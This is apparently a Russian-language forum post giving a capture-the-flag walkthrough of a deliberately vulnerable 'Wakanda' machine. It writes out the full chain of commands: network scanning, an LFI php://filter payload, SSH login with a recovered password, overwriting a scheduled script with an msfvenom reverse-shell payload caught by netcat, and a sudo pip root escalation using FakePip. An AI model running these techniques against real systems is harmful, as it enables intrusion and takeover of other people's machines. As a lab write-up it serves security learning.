Давайте начнем с сканирования сети, чтобы найти нашу цель. (Таким шрифтом показываются команды) netdiscover К нам на экран будут выведены такие данные.Начинаем поиски нашей wakan-ды Мы нашли нашу цель -> * Нашим следующим шагом будет сканирование нашей цели с помощью NMAP. nmap -p- -A * Мы ничего не нашли на веб-странице, поэтому мы используем dirb для перечисления каталогов. dirb http://* Все страницы, которые мы находим в сканировании dirb, имеют нулевой размер, и мы не находим никакого содержимого ни на одной из страниц. Мы взглянем на исходную страницу индексного файла и обнаружим параметр «lang», прокомментированный внутри страницы. Мы используем параметр «lang», как это было показано на странице, и находим, что текст был переведен на французский язык. Теперь мы проверяем, уязвим ли параметр «lang» для LFI. Мы можем использовать уязвимость LFI с помощью функции «php: //filter/convert.base64-encode» и получить доступ к странице индекса. curl http://*/?lang=php://filter/convert.base64-encode/resource=index Мы декодируем строку в кодировке base64 и находим пароль « Niamey4Ever227 !!! ». На странице мы видим, что « Мамаду » является автором. Когда мы регистрируемся через ssh, мы получаем приглашение Python IDE. Мы импортируем модуль pty и создаем оболочку '/ bin / bash'. Мы посмотрим на домашний каталог для пользователя mamaduo и найдем первый флаг. ssh mamaduo@* -p 3333 Перебирая каталоги, внутри каталога / tmp мы находим файл с именем test. Мы открываем его и не находим ничего интересного, но когда мы более внимательно посмотрим на файл, мы обнаружим, что он принадлежит devops. Теперь мы находим все файлы, принадлежащие пользователю devops, и находим файл с именем «.antivirus.py» в каталоге / srv. find / -user devops 2>/dev/null Теперь, когда мы открываем файл python, мы обнаруживаем, что он открывает и тестирует файл и пишет «test» внутри него. Чтобы использовать это, мы заменим код на шелл-код. Сначала мы создаем нагрузку на msfvenom. msfvenom -p cmd/unix/reverse_python lhost=* lport=4444 R После создания полезной нагрузки мы открываем «. antivirus.py », закомментируйте предыдущий код и вставьте нашу нагрузку без добавления« python -c ».(http://prntscr.com/m3edc4 Это должно выглядеть так) Мы настраиваем наш слушатель, используя netcat, и ждем несколько минут, чтобы скрипт был выполнен. Как только скрипт выполняется, мы получаем обратную оболочку. Когда мы проверяем UID, мы обнаруживаем, что мы создали оболочку для devops. Теперь мы идем в каталог / home / devops и находим второй флаг. Получив второй флаг, мы обнаружим, что мы можем выполнить pip с правами суперпользователя без прав root. Для всего этого дела нам нужен FakePip(https://github.com/0x00-0x00/FakePip) Мы загружаем скрипт fakepip в нашу систему, чтобы редактировать полезные данные внутри. git clone https://github.com/0x00-0x00/FakePip.git Мы редактируем нагрузку внутри функции os.system (http://prntscr.com/m3eeyn). Мы декодируем строку в кодировке base64 и меняем IP-адрес на наш IP-адрес. Затем мы снова конвертируем строку в base64 и заменяем старую строку новой. (http://prntscr.com/m3efc0) Мы запускаем сервер python в нашей системе, чтобы мы могли загрузить скрипт FakePip на целевой компьютер. python -m SimpleHTTPServer 80 После запуска HTTP-сервера мы загружаем скрипт на целевой компьютер, используя wget. Теперь выполните команду в соответствии с инструкциями, данными нам в файле readme для FakePip. wget http://192.168.1.134/setup.py sudo pip install . --upgrade --force-install Как только мы запустим команду, мы получим обратную оболочку от имени пользователя root. Теперь перейдем в корневой каталог и найдем корневой флаг. Итак,В Местах типо где стоит * тут вы должны вставить ip жертвы(wakand-ы) Итак,вот методика хака: Сетевое сканирование (Nmap, netdiscover) Перечисление службы HTTP Использование LFI с использованием php-фильтра Расшифруйте кодированный код 64 для пароля SSH Войти Получить 1- й флаг Поиск файлов, принадлежащих devops Перезаписать antivirus.py с помощью вредоносного кода Python Получить сессию Netcat Получить 2- й флаг Повышение привилегий судо Exploit Fake Pip Получить Root-доступ и захват 3-го флага
@vizit,Я видео овера 1 раз посмотрел(тема делалась с 1 зарубежного источника(это был огромный текст))